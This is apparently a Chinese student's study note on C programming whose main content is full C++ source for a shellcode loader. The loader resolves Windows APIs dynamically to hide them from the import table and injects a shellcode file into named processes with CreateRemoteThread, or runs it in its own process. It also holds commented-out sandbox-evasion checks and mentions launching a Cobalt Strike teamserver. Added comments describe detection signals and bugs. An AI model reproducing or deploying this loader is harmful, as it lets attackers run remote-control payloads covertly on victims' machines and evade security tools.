今天我们学习了C语言的参数分离和动态函数调用,我深入理解了C语言的灵活性和高效性。参数分离技术能有效处理输入参数,使得代码更加模块化和可重用。动态函数调用机制让我能够在运行时动态地调用函数,增强了程序的灵活性和扩展性。此外,通过对注入模块的学习,我掌握了如何在C语言中实现模块化编程,从而使得代码维护和升级变得更加简便。这些知识将对我今后的编程工作产生重要影响,提高我的编程技能和代码质量。
1.参数分离:
参数分离是指将代码中的配置数据从业务逻辑中分离出来,存储在独立的配置文件或数据库中。这样,当需要修改配置数据时,无需修改代码,只需修改配置文件或数据库中的数据即可。这种方式提高了代码的灵活性和可维护性,降低了代码的复杂度和维护成本。
2.注入模块:
在网络安全领域,注入攻击是一种常见的攻击手段,尤其是在Web应用程序中。注入攻击的本质是利用输入数据未被正确验证和过滤,从而使得攻击者能够执行恶意的代码或命令。本报告将详细介绍注入攻击中的一个重要模块——SQL注入,包括其原理、危害、常见类型以及防御措施。
3.动态调用:
3.1VirtualAlloc动态调用:
在某些情况下,我们可能需要在程序运行时动态地分配内存。在Windows系统中,可以使用VirtualAlloc函数来实现这一功能。
3.2其他敏感API的动态调用:
在实际开发中,有时我们可能需要动态调用一些敏感的API,比如用于文件操作、网络通信或系统控制的API。这些API可能在某些环境下被限制使用,因此需要动态加载并调用。
4.实现上述功能的代码:
头文件代码:
#pragma once
#include<Windows.h>
#include <tlhelp32.h>
#include <fstream>
#include<iostream>
using namespace std;
// Function-pointer aliases for the Win32 APIs this tool resolves at runtime
// through GetProcAddress instead of linking them by import. The signatures
// mirror the declarations in <Windows.h>; the SAL annotations are kept so
// static analysis still sees the parameter contracts.
// Because the names are resolved at runtime they do not appear in the
// binary's import table; statically, only the string literals handed to
// GetProcAddress remain visible, so detection has to rely on the runtime
// behaviour (the lookups and the calls themselves).
using fn_VirtualAllocEx = LPVOID(WINAPI*)(HANDLE hProcess,
                                          LPVOID lpAddress,
                                          SIZE_T dwSize,
                                          DWORD flAllocationType,
                                          DWORD flProtect);
using fn_OpenProcess = HANDLE(WINAPI*)(_In_ DWORD dwDesiredAccess,
                                       _In_ BOOL bInheritHandle,
                                       _In_ DWORD dwProcessId);
using fn_VirtualAlloc = LPVOID(WINAPI*)(_In_opt_ LPVOID lpAddress,
                                        _In_ SIZE_T dwSize,
                                        _In_ DWORD flAllocationType,
                                        _In_ DWORD flProtect);
using fn_CreateThread = HANDLE(WINAPI*)(_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
                                        _In_ SIZE_T dwStackSize,
                                        _In_ LPTHREAD_START_ROUTINE lpStartAddress,
                                        _In_opt_ __drv_aliasesMem LPVOID lpParameter,
                                        _In_ DWORD dwCreationFlags,
                                        _Out_opt_ LPDWORD lpThreadId);
功能代码:
#include "myFunc.h"
//字符转宽字符
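wchar_t* AtoW(char** a) {
    // Convert the narrow (multibyte, current-locale) string *a into a freshly
    // malloc()'ed wide string. The caller owns the returned buffer and must
    // free() it. Returns nullptr -- after reporting through perror() -- when
    // the input is missing, the bytes are not valid in the current locale, or
    // the allocation fails.
    // setlocale() is kept because mbstowcs() interprets the bytes according
    // to the process locale; note that it mutates global state for the whole
    // process on every call.
    setlocale(LC_ALL, "");
    if (a == nullptr || *a == nullptr) {
        return nullptr;
    }
    const char* narrow = *a;
    // First pass only measures. mbstowcs() reports an invalid sequence with
    // (size_t)-1, so the check must happen before the +1 for the terminator;
    // adding first would wrap the error value to 0 and hide it.
    const size_t wide_len = mbstowcs(nullptr, narrow, 0);
    if (wide_len == (size_t)-1) {
        perror("mbstowcs");
        return nullptr;
    }
    const size_t wide_size = wide_len + 1;  // room for L'\0'
    wchar_t* wide = static_cast<wchar_t*>(malloc(wide_size * sizeof(wchar_t)));
    if (wide == nullptr) {
        perror("malloc");
        return nullptr;
    }
    // Second pass performs the conversion; the result of a failed conversion
    // would be an unterminated buffer, so it is discarded rather than returned.
    if (mbstowcs(wide, narrow, wide_size) == (size_t)-1) {
        perror("mbstowcs");
        free(wide);
        return nullptr;
    }
    return wide;
}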
//读取shellcode
char* ReadFile(SIZE_T* length, char* file) {
// Reads the whole file named by `file` into a heap buffer (new[]) and stores
// its size in *length. The buffer is handed back as an owning raw pointer;
// no caller in this file ever deletes it.
// <Windows.h> also declares a Win32 ReadFile(); this definition overloads it
// with a different signature, presumably so the call sites resolve here.
char* filename = file;
ifstream infile;
// NOTE(review): ifstream adds ios::in itself, so the effective mode is
// in|out|binary, i.e. the file is opened read/write and must be writable
// by the caller even though it is only read.
infile.open(filename, ios::out | ios::binary);
// NOTE(review): the stream is positioned and measured before is_open() is
// checked below. On a missing/unopenable file tellg() yields -1, which
// becomes a huge SIZE_T and makes the new[] below throw std::bad_alloc.
infile.seekg(0, infile.end);
*length = infile.tellg();
infile.seekg(0, infile.beg);
char* data = new char[*length];
if (infile.is_open()) {
cout << "reading from the file" << endl;
// The number of bytes actually read is not checked, so a short read is
// invisible to the caller.
infile.read(data, *length);
}
// If the open failed the returned bytes are uninitialised.
return data;
}
//注入进程
void Inject(char* argv[]) {
// Copies the bytes of the file named by argv[2] into every running process
// whose image name contains argv[3] and starts a thread on them there.
// argv comes straight from main(); argv[2] and argv[3] are used unvalidated.
// Defender's view: each step below is an observable endpoint event --
// a process snapshot, OpenProcess with PROCESS_ALL_ACCESS, an RWX
// VirtualAllocEx in another process, WriteProcessMemory into it, and a
// CreateRemoteThread whose start address is that freshly written region.
// This is the textbook remote-thread injection sequence that process
// monitoring rules key on.
SIZE_T length = 0;
char* data;
data = ReadFile(&length, argv[2]);
/*LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, data, length);
EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);*/
HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // snapshot of the current process list
if (snapshot_handle != INVALID_HANDLE_VALUE) {
// Walk every process in the snapshot
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snapshot_handle, &process_entry)) {
do {
// Image name of the current entry. Assumes a UNICODE build so that
// szExeFile is a wide string -- in an ANSI build this line would not compile.
std::wstring extFileName(process_entry.szExeFile);
// The target name is converted to wide on every iteration; the malloc'ed
// result is never freed, so this leaks once per enumerated process.
wchar_t* exename = AtoW(&argv[3]);
// Substring match of the target name against the image name. Comparing
// with std::string::npos instead of std::wstring::npos works because both
// are size_t(-1).
if (extFileName.find(exename) != std::string::npos) {
// Resolve OpenProcess at runtime; kernel32 is already loaded in every
// process, so LoadLibraryA only returns the existing module.
fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
// Requests full access to the target; returns NULL when the caller
// lacks the rights to open it.
HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
if (process_handle != NULL) {
// Allocate a readable, writable AND executable region in the target.
fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remote_buffer != NULL) {
SIZE_T bytes_written;
// Copy the file bytes into the remote region. bytes_written is never
// compared with length, so a partial write goes unnoticed.
if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
std::cout << "Remote buffer address: " << remote_buffer << std::endl;
// Start a thread in the target whose entry point is the region just written.
HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
if (remote_thread != NULL) {
// Block until that thread exits; if it never does, Inject() never
// returns and no further process is visited.
WaitForSingleObject(remote_thread, INFINITE);
CloseHandle(remote_thread);
}
}
// NOTE(review): remote_buffer is an address returned by VirtualAllocEx,
// not a kernel handle, so this CloseHandle call fails and the remote
// region stays allocated in the target.
CloseHandle(remote_buffer);
}
// Release the process handle
CloseHandle(process_handle);
}
}
} while (Process32Next(snapshot_handle, &process_entry)); // advance to the next entry
}
// Release the snapshot handle
CloseHandle(snapshot_handle);
}
}
//正常上线
VOID Normal(char* file) {
// Reads `file` into memory and executes its bytes in the current process:
// VirtualAlloc (RWX) -> memcpy -> CreateThread on the buffer -> wait forever.
// VirtualAlloc and CreateThread are fetched with GetProcAddress rather than
// called through the import table. No return value and no error reporting.
SIZE_T length = 0;
char* data = NULL;
data = ReadFile(&length, file);
fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
// 0x00001000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE written as
// raw numbers; Inject() spells the same flags out by name. A private RWX
// allocation followed by a thread started at that address is the in-process
// counterpart of the pattern in Inject() and is just as visible to memory
// scanners.
LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);
// No NULL check: if the allocation failed, this writes through a null pointer.
memcpy(shell_addr, data, length);
HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
// -1 converts to INFINITE: block until the thread ends. HThread is never
// closed and a NULL thread handle is not checked for.
WaitForSingleObject(HThread, -1);
}
//LPVOID == Long Point VOID
//int Check_MulDiv_1() {
// // Call MulDiv with specific arguments
// int result = MulDiv(1, 0x80000000, 0x80000000);
//
// // Check if the result matches the expected value
// if (result != 2) {
// std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;
// }
// else {
// std::cout << "MulDiv evasion method not detected." << std::endl;
// }
//
// return 0;
//}
//int Check_MulDiv_2() {
// // Check for the existence of Wine's exclusive APIs
// HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
// FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");
// HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
// FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");
//
// if (wineGetUnixFileName || wineGetHostVersion) {
// std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;
// }
// else {
// std::cout << "Wine's exclusive APIs not detected." << std::endl;
// }
//
// return 0;
//}
// 远控的上线程序会变成你的注入目标程序
// User,管理员,System
// 主函数
int main(int argc, char* argv[]) {
// Entry point / command dispatch:
//   -i <file> <process-name>  -> Inject()
//   -d <file>                 -> Normal() (run the file's bytes in this process)
//   -h                        -> usage text
// NOTE(review): argv[1] is dereferenced before argc is checked, so starting
// the program with no arguments reads past the end of argv. Only the -i
// branch verifies argc; -d uses argv[2] unchecked.
if (strcmp(argv[1], "-i") == 0) {
if (argc == 4) {
printf("Injecting!!!\n");
Inject(argv);
}
else {
// Usage hint for -i (Chinese): "-i <path> <process name>"
wprintf(L"注入方式:-i 路径 进程名\n");
}
}
if (strcmp(argv[1], "-d") == 0) {
Normal(argv[2]);
};
if (strcmp(argv[1], "-h") == 0) {
printf("-i Inject\n-h help\n-d normal\n");
}
/*printf("%d\n", argc);
printf("%s", argv[1]);*/
return 0;
}
截图:
打开finalShell用命令行启动teamserver:
连接cobaltstrike: